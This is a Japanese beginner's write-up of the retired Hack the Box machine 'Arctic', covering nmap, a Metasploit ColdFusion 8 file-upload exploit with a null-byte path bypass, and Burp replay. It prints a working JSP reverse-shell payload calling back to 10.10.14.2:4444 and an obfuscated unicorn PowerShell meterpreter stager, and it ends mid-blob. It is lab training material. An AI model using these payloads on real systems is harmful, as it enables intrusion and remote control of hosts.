僕にとって初めて挑戦する Hack the Box の machine です。
説明ガバガバな部分もあると思いますがアドバイスや訂正があったらぜひぜひコメントにお願いします。
今回挑戦する Arctic はすでに retired されている machine なので公式の write-throughが Youtube で公開されています。 こちらを参考にして進めていきます。
cheat sheet
以下で cheat sheet としてツールの使い方などをまとめています。参考にしてください。 github | sanposhiho/MYCHEATSHEET
machine について
難易度は easy です。
nmap でポートスキャン
kali@kali:~$ nmap -Pn -A 10.10.10.11
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-16 00:36 EST
Nmap scan report for 10.10.10.11
Host is up (0.20s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8500/tcp open fmtp?
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 159.32 seconds使用した nmap の各オプションについて
Namp スキャンの全コマンド・オプションを日本語解説|ネットワークのセキュリティーは Nmap で抑えよう
-Pn : ICMPのみでなく80,443番ポートにもTCPパケットを送り、同セグメントではARPも送信しホストの存在を判断
-A : OSの種類とそのバージョンを検知ICMP とは
通常 nmap はスキャンの前に ping での疎通確認を行っているそうです。ICMP とは ping コマンドを使用した際に用いられているプロトコルだそうで。 ICMP と PING コマンド
ARP とは
ARP とは IP アドレスから MAC アドレスを知るために用いるプロトコルだそうです。
一旦公式の write-through を見る
公式の write-through では以下のオプションで nmap を使用していました。
$ nmap -sV -sC -oA nmap 10.10.10.11オプションについて
-sV バージョン検出のみ行う(-AはOSの種類とバージョンの検出)
-sC デフォルトのNSEスクリプトを実行する
-oA 出力結果を(全フォーマットに)出力する以下の公式のリファレンスが参考になります サービスとバージョンの検出 出力 Chapter 9. Nmap Scripting Engine
NSE に関しては以下のページも参考になります。 Nmap Scripting Engine
発見した 8500 番ポートにブラウザでアクセスする
僕は結果をみてもよくわからないので全てのポートにアクセスしてみました。8500 番ポートのみディレクトリを表示します。
色々いじってみて /CFIDE/administrator にアクセスすると Coldfusion8 administrator と書かれたページが現れます。
Coldfusion の exploit を探す
searchsploitコマンドで Coldfusion8 の exploit を探します。
kali@kali:~$ searchsploit coldfusion
-------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Adobe ColdFusion - 'probe.cfm' Cross-Site Scripting | exploits/cfm/webapps/36067.txt
Adobe ColdFusion - Directory Traversal | exploits/multiple/remote/14641.py
Adobe ColdFusion - Directory Traversal (Metasploit) | exploits/multiple/remote/16985.rb
Adobe ColdFusion 2018 - Arbitrary File Upload | exploits/multiple/webapps/45979.txt
Adobe ColdFusion 6/7 - User_Agent Error Page Cross-Site Scripting | exploits/cfm/webapps/29567.txt
Adobe ColdFusion 7 - Multiple Cross-Site Scripting Vulnerabilities | exploits/cfm/webapps/36172.txt
Adobe ColdFusion 9 - Administrative Authentication Bypass | exploits/windows/webapps/27755.txt
Adobe ColdFusion 9 - Administrative Authentication Bypass (Metasploit) | exploits/multiple/remote/30210.rb
Adobe ColdFusion < 11 Update 10 - XML External Entity Injection | exploits/multiple/webapps/40346.py
Adobe ColdFusion APSB13-03 - Remote Multiple Vulnerabilities (Metasploit) | exploits/multiple/remote/24946.rb
Adobe ColdFusion Server 8.0.1 - '/administrator/enter.cfm' Query String Cross-Site Scripting | exploits/cfm/webapps/33170.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_authenticatewizarduser.cfm' Query String Cross-Site Scripting | exploits/cfm/webapps/33167.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_logintowizard.cfm' Query String Cross-Site Scripting | exploits/cfm/webapps/33169.txt
Adobe ColdFusion Server 8.0.1 - 'administrator/logviewer/searchlog.cfm?startRow' Cross-Site Scripting | exploits/cfm/webapps/33168.txt
Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code Execution | exploits/windows/remote/43993.py
Allaire ColdFusion Server 4.0 - Remote File Display / Deletion / Upload / Execution | exploits/multiple/remote/19093.txt
Allaire ColdFusion Server 4.0.1 - 'CFCRYPT.EXE' Decrypt Pages | exploits/windows/local/19220.c
Allaire ColdFusion Server 4.0/4.0.1 - 'CFCACHE' Information Disclosure | exploits/multiple/remote/19712.txt
ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit) | exploits/cfm/webapps/16788.rb
ColdFusion 9-10 - Credential Disclosure | exploits/multiple/webapps/25305.py
ColdFusion MX - Missing Template Cross-Site Scripting | exploits/cfm/remote/21548.txt
ColdFusion MX - Remote Development Service | exploits/windows/remote/50.pl
ColdFusion Scripts Red_Reservations - Database Disclosure | exploits/asp/webapps/7440.txt
ColdFusion Server 2.0/3.x/4.x - Administrator Login Password Denial of Service | exploits/multiple/dos/19996.txt
Macromedia ColdFusion MX 6.0 - Error Message Full Path Disclosure | exploits/cfm/webapps/22544.txt
Macromedia ColdFusion MX 6.0 - Oversized Error Message Denial of Service | exploits/multiple/dos/24013.txt
Macromedia ColdFusion MX 6.0 - Remote Development Service File Disclosure | exploits/multiple/remote/22867.pl
Macromedia ColdFusion MX 6.0 - SQL Error Message Cross-Site Scripting | exploits/cfm/webapps/23256.txt
Macromedia ColdFusion MX 6.1 - Template Handling Privilege Escalation | exploits/multiple/remote/24654.txt
-------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Resultversion 8 を抜き出すと
Adobe ColdFusion Server 8.0.1 - '/administrator/enter.cfm' Query String Cross-Site Scripting | exploits/cfm/webapps/33170.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_authenticatewizarduser.cfm' Query String Cross-Site Scripting | exploits/cfm/webapps/33167.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_logintowizard.cfm' Query String Cross-Site Scripting | exploits/cfm/webapps/33169.txt
Adobe ColdFusion Server 8.0.1 - 'administrator/logviewer/searchlog.cfm?startRow' Cross-Site Scripting | exploits/cfm/webapps/33168.txt
ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit) | exploits/cfm/webapps/16788.rbFile Uploadのやつを使います
Metasploit で頑張る
msf5 > search coldfusion
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/gather/coldfusion_pwd_props 2013-05-07 normal Yes ColdFusion 'password.properties' Hash Extraction
1 auxiliary/scanner/http/adobe_xml_inject normal No Adobe XML External Entity Injection
2 auxiliary/scanner/http/coldfusion_locale_traversal normal No ColdFusion Server Check
3 auxiliary/scanner/http/coldfusion_version normal No ColdFusion Version Scanner
4 exploit/linux/misc/hid_discoveryd_command_blink_on_unauth_rce 2016-03-28 excellent Yes HID discoveryd command_blink_on Unauthenticated RCE
5 exploit/multi/http/coldfusion_ckeditor_file_upload 2018-09-11 excellent No Adobe ColdFusion CKEditor unrestricted file upload
6 exploit/multi/http/coldfusion_rds_auth_bypass 2013-08-08 great Yes Adobe ColdFusion RDS Authentication Bypass
7 exploit/windows/http/coldfusion_fckeditor 2009-07-03 excellent No ColdFusion 8.0.1 Arbitrary File Upload and Execute
msf5 > use exploit/windows/http/coldfusion_fckeditor
msf5 exploit(windows/http/coldfusion_fckeditor) > show options
Module options (exploit/windows/http/coldfusion_fckeditor):
Name Current Setting Required Description
---- --------------- -------- -----------
FCKEDITOR_DIR /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm no The path to upload.cfm
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Universal Windows Target
msf5 exploit(windows/http/coldfusion_fckeditor) > set RHOSTS 10.10.10.11
RHOSTS => 10.10.10.11
msf5 exploit(windows/http/coldfusion_fckeditor) > set RPORT 8500
RPORT => 8500
msf5 exploit(windows/http/coldfusion_fckeditor) > run
[*] Started reverse TCP handler on 10.10.14.2:4444
[*] Sending our POST request...
[-] Upload Failed...
[*] Exploit completed, but no session was created.先ほどの exploit を使用して普通にやってみても失敗します。
advance option をいじる
msf5 exploit(windows/http/coldfusion_fckeditor) > show advanced option
Module advanced options (exploit/windows/http/coldfusion_fckeditor):
Name Current Setting Required Description
---- --------------- -------- -----------
ContextInformationFile no The information file that contains context information
DOMAIN WORKSTATION yes The domain to use for windows authentification
DigestAuthIIS true no Conform to IIS, should work for most servers. Only set to false for non-IIS servers
DisablePayloadHandler false no Disable the handler code for the selected payload
EnableContextEncoding false no Use transient context when encoding payloads
FingerprintCheck true no Conduct a pre-exploit fingerprint verification
HttpClientTimeout no HTTP connection and receive timeout
HttpPartialResponses false no Return partial HTTP responses despite timeouts
HttpPassword no The HTTP password to specify for authentication
HttpRawHeaders no Path to ERB-templatized raw headers to append to existing headers
HttpTrace false no Show the raw HTTP requests and responses
HttpUsername no The HTTP username to specify for authentication
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
UserAgent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) no The User-Agent header to use for all requests
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
WfsDelay 0 no Additional delay when waiting for a session
Payload advanced options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
ARCH no The architecture that is being targeted
PLATFORM no The platform that is being targeted
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
[-] Invalid parameter "option", use "show -h" for more information
msf5 exploit(windows/http/coldfusion_fckeditor) > set VERBOSE true
VERBOSE => true
msf5 exploit(windows/http/coldfusion_fckeditor) > run
[*] Started reverse TCP handler on 10.10.14.2:4444
[*] Sending our POST request...
[-] Upload Failed...
[*] Exploit completed, but no session was created.VERBOSE を true に変更してみましたが、出力は変わりませんでした。
Burp Suite
Burp Suite でリクエストの内容をみて原因を探ります。
以下のように設定します。
これにより localhost:8500 に来たリクエストは Burp Suite によって 10.10.10.11:8500 に redirect されます。
再度チャレンジ
intercept が on なことを確認してから、
exploit の向きを localhost:8500 に変更し、run します。
msf5 exploit(windows/http/coldfusion_fckeditor) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf5 exploit(windows/http/coldfusion_fckeditor) > run同様に失敗しますが、Burp Suite でそのリクエストをキャッチします。 Repeater を使用してキャッチしたリクエスト(run によって送信されたリクエスト)を再度 Burp Suite を使って送信します。
すると成功します。
※ここ未だに謎ポイントです。 何故 Metasploit では失敗したのに Burp Suite を使うと成功するのでしょうか? 僕なりには Metasploit では一定の時間 response が無いと失敗と見なされる。今回は一度のリクエストでレスポンスが帰ってくるまでに暫くの時間がかかるので失敗となった。 ということなのかなと思いましたが、どうなんでしょうか。 (分かる方いらっしゃいましたらコメントお願いします 🙇♂️)
リクエストで何が送られているかを見る
run で何がリクエストされているのかをみてみます。
POST /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/Y.jsp%00 HTTP/1.1
Host: 127.0.0.1:8500
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: multipart/form-data; boundary=_Part_387_507016430_1561099465
Content-Length: 1585
Connection: close
--_Part_387_507016430_1561099465
Content-Disposition: form-data; name="newfile"; filename="QNAXOXFN.txt"
Content-Type: application/x-java-archive
<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>
<%
class StreamConnector extends Thread
{
InputStream sq;
OutputStream ab;
StreamConnector( InputStream sq, OutputStream ab )
{
this.sq = sq;
this.ab = ab;
}
public void run()
{
BufferedReader ek = null;
BufferedWriter hnb = null;
try
{
ek = new BufferedReader( new InputStreamReader( this.sq ) );
hnb = new BufferedWriter( new OutputStreamWriter( this.ab ) );
char buffer[] = new char[8192];
int length;
while( ( length = ek.read( buffer, 0, buffer.length ) ) > 0 )
{
hnb.write( buffer, 0, length );
hnb.flush();
}
} catch( Exception e ){}
try
{
if( ek != null )
ek.close();
if( hnb != null )
hnb.close();
} catch( Exception e ){}
}
}
try
{
String ShellPath = "cmd.exe";
Socket socket = new Socket( "10.10.14.2", 4444 );
Process process = Runtime.getRuntime().exec( ShellPath );
( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
} catch( Exception e ) {}
%>
--_Part_387_507016430_1561099465--CurrentFolder=/Y.jsp%00となっていて最後に null byte が入っていることで CurrentFolder のチェックをかいくぐっているという認識で大丈夫ですかね?
(ここも理解が怪しい)
ファイルの中身により 10.10.14.2:4444 で待ち受けてリバースシェルを取得できそうです
upload したファイルを実行
まず、nc コマンドを使ってリバースシェルを待ち受けます。
kali@kali:~$ nc -lvnp 4444
listening on [any] 4444 ...先ほどの interrupt を off にしてから
ブラウザで先ほど upload したファイルにアクセスすることで実行します。
すると
kali@kali:~$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.11] 49224
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\ColdFusion8\runtime\bin>このようにリバースシェルを取得できます。
nc コマンドのオプションについて
-n:DNSによる名前解決を行わない
-l:リッスンモード
-v:標準メッセージの出力
-p:ポートの指定Meterpreter を利用したい
unicornを使用します。 (Kali Linux にはデフォでは入っていないようなので僕は github から落としました)
unicorn は PowerShell のダウングレード攻撃を利用して何かをよしなにやってくれるツールだそうです。(これもあんまりわかっていない)
unicorn の利用方法は
Usage: python unicorn.py payload reverse_ipaddr port <optional hta or macro, crt>です。
以下のコマンドを実行します。
kali@kali:~$ unicorn/unicorn.py windows/meterpreter/reverse_tcp 10.10.14.2 31337これによって 2 つのファイルが生成されます。
生成ファイルその 1:unicorn.rc
kali@kali:~$ cat unicorn.rc
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.14.2
set LPORT 31337
set ExitOnSession false
set AutoVerifySession false
set AutoSystemInfo false
set AutoLoadStdapi false
exploit -jmatesploit 内でやるべきことを色々書いてくれています。
生成ファイルその 2:powershell_attack.txt
kali@kali:~$ cat powershell_attack.txt
powershell /w 1 /C "s\"\"v IJi -;s\"\"v zx e\"\"c;s\"\"v Aac ((g\"\"v IJi).value.toString()+(g\"\"v zx).value.toString());powershell (g\"\"v Aac).value.toString() ('JABvAGcAPQAnACQAbgBtAD0AJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAeQBuAEEAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlACIAKwAiAGwAIgArACIAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABhAEMAcgAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQAiACsAIgBsACIAKwAiADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABoAHoAWAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAbgBtAD0AJABuAG0ALgByAGUAcABsAGEAYwBlACgAIgBhAEMAcgAiACwAIAAiAEMAcgBlAGEAdABlAFQAaAByACIAKwAiAGUAIgArACIAYQBkACIAKQA7ACQAbgBtAD0AJABuAG0ALgByAGUAcABsAGEAYwBlACgAIgB5AG4AQQAiACwAIAAiAGMAYQBsAGwAbwBjACIAKQA7ACQAdABSAD0AIgB9AGUAOAAsAH0AOAAyACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA2ADAALAB9ADgAOQAsAH0AZQA1ACwAfQAzADEALAB9AGMAMAAsAH0ANgA0ACwAfQA4AGIALAB9ADUAMAAsAH0AMwAwACwAfQA4AGIALAB9ADUAMgAsAH0AMABjACwAfQA4AGIALAB9ADUAMgAsAH0AMQA0ACwAfQA4AGIALAB9ADcAMgAsAH0AMgA4ACwAfQAwAGYALAB9AGIANwAsAH0ANABhACwAfQAyADYALAB9ADMAMQAsAH0AZgBmACwAfQBhAGMALAB9ADMAYwAsAH0ANgAxACwAfQA3AGMALAB9ADAAMgAsAH0AMgBjACwAfQAyADAALAB9AGMAMQAsAH0AYwBmACwAfQAwAGQALAB9ADAAMQAsAH0AYwA3ACwAfQBlADIALAB9AGYAMgAsAH0ANQAyACwAfQA1ADcALAB9ADgAYgAsAH0ANQAyACwAfQAxADAALAB9ADgAYgAsAH0ANABhACwAfQAzAGMALAB9ADgAYgAsAH0ANABjACwAfQAxADEALAB9ADcAOAAsAH0AZQAzACwAfQA0ADgALAB9ADAAMQAsAH0AZAAxACwAfQA1ADEALAB9ADgAYgAsAH0ANQA5ACwAfQAyADAALAB9ADAAMQAsAH0AZAAzACwAfQA4AGIALAB9ADQAOQAsAH0AMQA4ACwAfQBlADMALAB9ADMAYQAsAH0ANAA5ACwAfQA4AGIALAB9ADMANAAsAH0AOABiACwAfQAwADEALAB9AGQANgAsAH0AMwAxACwAfQBmAGYALAB9AGEAYwAsAH0AYwAxACwAfQBjAGYALAB9ADAAZAAsAH0AMAAxACwAfQBjADcALAB9ADMAOAAsAH0AZQAwACwAfQA3ADUALAB9AGYANgAsAH0AMAAzACwAfQA3AGQALAB9AGYAOAAsAH0AMwBiACwAfQA3AGQALAB9ADIANAAsAH0ANwA1ACwAfQBlADQALAB9ADUAOAAsAH0AOABiACwAfQA1ADgALAB9ADIANAAsAH0AMAAxACwAfQBkADMALAB9ADYANgAsAH0AOABiACwAfQAwAGMALAB9ADQAYgAsAH0AOABiACwAfQA1ADgALAB9ADEAYwAsAH0AMAAxACwAfQBkADMALAB9ADgAYgAsAH0AMAA0ACwAfQA4AGIALAB9ADAAMQAsAH0AZAAwACwAfQA4ADkALAB9ADQANAAsAH0AMgA0ACwAfQAyADQALAB9ADUAYgAsAH0ANQBiACwAfQA2ADEALAB9ADUAOQAsAH0ANQBhACwAfQA1ADEALAB9AGYAZgAsAH0AZQAwACwAfQA1AGYALAB9ADUAZgAsAH0ANQBhACwAfQA4AGIALAB9ADEAMgAsAH0AZQBiACwAfQA4AGQALAB9ADUAZAAsAH0ANgA4ACwAfQAzADMALAB9ADMAMgAsAH0AMAAwACwAfQAwADAALAB9ADYAOAAsAH0ANwA3ACwAfQA3ADMALAB9ADMAMgAsAH0ANQBmACwAfQA1ADQALAB9ADYAOAAsAH0ANABjACwAfQA3ADcALAB9ADIANgAsAH0AMAA3ACwAfQA4ADkALAB9AGUAOAAsAH0AZgBmACwAfQBkADAALAB9AGIAOAAsAH0AOQAwACwAfQAwADEALAB9ADAAMAAsAH0AMAAwACwAfQAyADkALAB9AGMANAAsAH0ANQA0ACwAfQA1ADAALAB9ADYAOAAsAH0AMgA5ACwAfQA4ADAALAB9ADYAYgAsAH0AMAAwACwAfQBmAGYALAB9AGQANQAsAH0ANgBhACwAfQAwAGEALAB9ADYAOAAsAH0AMABhACwAfQAwAGEALAB9ADAAYwAsAH0AYwAyACwAfQA2ADgALAB9ADAAMgAsAH0AMAAwACwAfQA3AGEALAB9ADYAOQAsAH0AOAA5ACwAfQBlADYALAB9ADUAMAAsAH0ANQAwACwAfQA1ADAALAB9ADUAMAAsAH0ANAAwACwAfQA1ADAALAB9ADQAMAAsAH0ANQAwACwAfQA2ADgALAB9AGUAYQAsAH0AMABmACwAfQBkAGYALAB9AGUAMAAsAH0AZgBmACwAfQBkADUALAB9ADkANwAsAH0ANgBhACwAfQAxADAALAB9ADUANgAsAH0ANQA3ACwAfQA2ADgALAB9ADkAOQAsAH0AYQA1ACwAfQA3ADQALAB9ADYAMQAsAH0AZgBmACwAfQBkADUALAB9ADgANQAsAH0AYwAwACwAfQA3ADQALAB9ADAAYwAsAH0AZgBmACwAfQA0AGUALAB9ADAAOAAsAH0ANwA1ACwAfQBlAGMALAB9ADYAOAAsAH0AZgAwACwAfQBiADUALAB9AGEAMgAsAH0ANQA2ACwAfQBmAGYALAB9AGQANQAsAH0ANgBhACwAfQAwADAALAB9ADYAYQAsAH0AMAA0ACwAfQA1ADYALAB9ADUANwAsAH0ANgA4ACwAfQAwADIALAB9AGQAOQAsAH0AYwA4ACwAfQA1AGYALAB9AGYAZgAsAH0AZAA1ACwAfQA4AGIALAB9ADMANgAsAH0ANgBhACwAfQA0ADAALAB9ADYAOAAsAH0AMAAwACwAfQAxADAALAB9ADAAMAAsAH0AMAAwACwAfQA1ADYALAB9ADYAYQAsAH0AMAAwACwAfQA2ADgALAB9ADU'+'AOAAsAH0AYQA0ACwAfQA1ADMALAB9AGUANQAsAH0AZgBmACwAfQBkADUALAB9ADkAMwAsAH0ANQAzACwAfQA2AGEALAB9ADAAMAAsAH0ANQA2ACwAfQA1ADMALAB9ADUANwAsAH0ANgA4ACwAfQAwADIALAB9AGQAOQAsAH0AYwA4ACwAfQA1AGYALAB9AGYAZgAsAH0AZAA1ACwAfQAwADEALAB9AGMAMwAsAH0AMgA5ACwAfQBjADYALAB9ADcANQAsAH0AZQBlACwAfQBjADMAIgA7ACQATgBqAD0AQQBkAGQALQBUAHkAcABlACAALQBwAGEAcwBzACAALQBtACAAJABuAG0AIAAtAE4AYQBtAGUAIAAiAHkAUQAiACAALQBuAGEAbQBlAHMAIABKAGUAYgA7ACQATgBqAD0AJABOAGoALgByAGUAcABsAGEAYwBlACgAIgBKAGUAYgAiACwAIAAiAFcAaQBuADMAMgBGAHUAbgBjAHQAaQAiACsAIgBvACIAKwAiAG4AcwAiACkAOwBbAGIAeQB0AGUAWwBdAF0AJAB0AFIAIAA9ACAAJAB0AFIALgByAGUAcABsAGEAYwBlACgAIgB9ACIALAAiAGUAQgBzAEwAeAAiACkALgByAGUAcABsAGEAYwBlACgAIgBlAEIAcwBMACIALAAgACIAMAAiACkALgBTAHAAbABpAHQAKAAiACwAIgApADsAJABUAEEAPQAwAHgAMQAwADAAMgA7AGkAZgAgACgAJAB0AFIALgBMACAALQBnAHQAIAAwAHgAMQAwADAAMgApAHsAJABUAEEAPQAkAHQAUgAuAEwAfQA7ACQAZwBCAD0AJABOAGoAOgA6AGMAYQBsAGwAbwBjACgAMAB4ADEAMAAwADIALAAgADEAKQA7AFsAVQBJAG4AdAA2ADQAXQAkAGgAegBYACAAPQAgADAAOwBmAG8AcgAoACQAcABpAD0AMAA7ACQAcABpACAALQBsAGUAKAAkAHQAUgAuAEwAZQBuAGcAdABoAC0AMQApADsAJABwAGkAKwArACkAewAkAE4AagA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAGcAQgAuAFQAbwBJAG4AdAAzADIAKAApACsAJABwAGkAKQAsACAAJAB0AFIAWwAkAHAAaQBdACwAIAAxACkAfQA7ACQATgBqADoAOgBWAGkAcgB0AHUAYQBsAFAAcgBvAHQAZQBjAHQAKAAkAGcAQgAsACAAMAB4ADEAMAAwADIALAAgADAAeAA0ADAALAAgAFsAUgBlAGYAXQAkAGgAegBYACkAOwAkAE4AagA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAB4ADAAMAAsACQAZwBCACwAMAAsADAALAAwACkAOwAnADsAJABoAHUAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAG8AZwApACkAOwAkAFYASQA9ACIAcABvAHcAZQByAHMAaABlAGwAbAAiADsAJABCAHYAPQAiAFcAaQBuAGQAbwB3AHMAIgA7ACQAcgBhAGMAIAA9ACAAIgBDADoAXAAkAEIAdgBcAHMAeQBzAHcAbwB3ADYANABcACQAQgB2ACQAVgBJAFwAdgAxAC4AMABcACQAVgBJACIAOwAkAEMAYQBVACAAPQAgACcAVAByAHUAIgArACIAZQAiACsAIgAnADsAaQBmACgAWwBlAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoASQBzADYANABCAGkAdABPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQAgAC0AZQBxACAAJwAkAEMAYQBVACcAKQB7ACQAVgBJAD0AIAAkAHIAYQBjAH0AOwAkAFUAVgA9ACIAIAAkAFYASQAgAHEAUgBoACAAJABoAHUAIgA7ACQAVQBWAD0AJABVAFYALgByAGUAcABsAGEAYwBlACgAIgBxAFIAaAAiACwAIAAiAC0AbgBvAGUAeABpAHQAIAAtAGUAIgApADsAaQBlAHgAIAAkAFUAVgA=')"実際の攻撃コードです。
先ほどのリバースシェルから powershell_attack.txt を実行
まず、powershell_attack.txt を編集して exploit.html として保存します。
s\"\"v IJi -;s\"\"v zx e\"\"c;s\"\"v Aac ((g\"\"v IJi).value.toString()+(g\"\"v zx).value.toString());powershell (g\"\"v Aac).value.toString() ('JABvAGcAPQAnACQAbgBtAD0AJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAeQBuAEEAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlACIAKwAiAGwAIgArACIAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABhAEMAcgAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQAiACsAIgBsACIAKwAiADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQA